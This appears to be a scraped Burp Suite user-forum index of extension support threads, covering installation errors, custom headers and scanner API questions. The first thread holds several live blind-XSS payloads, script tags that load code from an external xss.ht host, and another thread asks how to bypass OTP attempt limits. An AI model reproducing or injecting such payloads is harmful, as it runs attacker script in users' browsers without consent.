Burp Extensions - Burp Suite User Forum

Ridiculous Trying to exploit"><script src=https://xssjacked.xss.ht></script> u for Blind XSS "><script src=https://xssjacked.xss.ht></script>

PLZ Work "><script src=https://xssjacked.xss.ht></script> . Never mind about . "><script src=https://xssjacked.xss.ht></script>

Issues with loading python modules

except for java, python extenders are not working. please help Thanks Prathik

REG : IP rotate Burp Plugin was not rotating IPs

Hi, I tried using IP Rotate extension and I installed all dependencies but when we tried intruder and we monitored the traffic in victim. IP was not changing and it was giving only the AWS attacker IP. I have configured...

Multiple Headers

Hi, for a bug bounty program, I need to add two X-Headers to all requests. The available extension seems to allow only one custom header to add. How can I add multiple header? Thanks and Regards Holger

IScannerCheck consolidateDuplicateIssues for Host Based findings

Hi PortSwigger Team, I'm writing an extension to make use of the IScannerCheck for an active scan finding. From the description of the consolidateDuplicateIssues method, it appears that this method is run when comparing...

Burp bounty extension doesn't appear in gui

After configuring the extension and closing burp suite pro, the next time I opened it the extension wasn't there anymore. The extension appears to be installed but doesn't show in GUI. I have tried: - insulating...

CA certificate

i want to install CA certificate in DER format with key but i am not getting any of such options. please help me to install CA certificate

Detected Desalinisation Jackson

Dear Team, I have installed active scan++ and Freddy, Deserialization Bug Finder. It shows my webapp is vulnerable to Detected Desalinisation Jackson with High severity and certain confidence, and in response tab it seems...

getting error while installing brupsuite

root@kali:~/Downloads# chmod +x burpsuite_community_linux_v2021_5_1.sh root@kali:~/Downloads# ./burpsuite_community_linux_v2021_5_1.shUnpacking JRE ... Starting Installer ... ./burpsuite_community_linux_v2021_5_1.sh: 598:...

Did not get the trial license key

I signed up for a trial for the professional version but haven't received the license key for it! Please help...

Unable to download burp extensions

I am trying to install a few burp extensions but download from BAPP store fails. Have tried using upstream proxy as well. I am using corporate proxy to connect to https://portswigger.net/ but result is blank page. I am...

How can i use global variable like fucntionality in burp repeater

I have a request in repeater and i want to store some values from this request as a global variable so that i can use them in other requests. it could be like in a key-value pair and stored in a seprate tab of extension...

Burp Suite's Extension Turbo Intruder

Hello, When I type special characters (ö, ü, ı etc) in Turkish to the parameters sent in the post request using the turbo intruder, it converts them to characters like Ä ±, Ã¼, Ã¶. Is there any way to prevent...

IMessageEditor - Custom highlighting

Hey all! I've been adding a requested feature in Logger++, but have a question about the Burp API, and thought I'd post it here in case others have the same question in future. Logger++ has a "Grepper" functionality, and...

how Integrate Burp suit pro with Selenium automation

Hi team, I like know how to integrate burp suite pro with selenium automation for to perform active scan and spider. i have successfully done proxy the https with selenium scripts but I'm not able to trigger spider or...

Bypass OTP attemtps

Are there any extensions or helpful documentation out there that might help me to bypass thr OTP attempts. I tried doing an attack but after a few OTP tries, it says I have tried too many times.

Cannot install burp extensions in 2021.5.1 of Burp Pro

I get the following error when I manually install *any* extension: java.lang.ClassNotFoundException: burp.BurpExtender at java.base/java.net.URLClassLoader.findClass(URLClassLoader.java:435) at...

How do I add a custom cookie to every request in the proxy? (Must be extender + session handler as cookie changes every request)

I saw a way to add custom headers to every request in Burp via an extension + session handler rule: (https://forum.portswigger.net/thread/multiple-headers-9e49d8d25cdf99e1769) however I was wondering if I could have some...

Flow - lost logs

Hi I was using the Flow extension yesterday which I just discovered and thought was awesome (should be built in), and I ran a large upload scan with the Upload Scanner extension. This morning all the logs were there...

not able to download the professional Burp exe file.

When ever i am trying to download the exe file its downloading the release notes.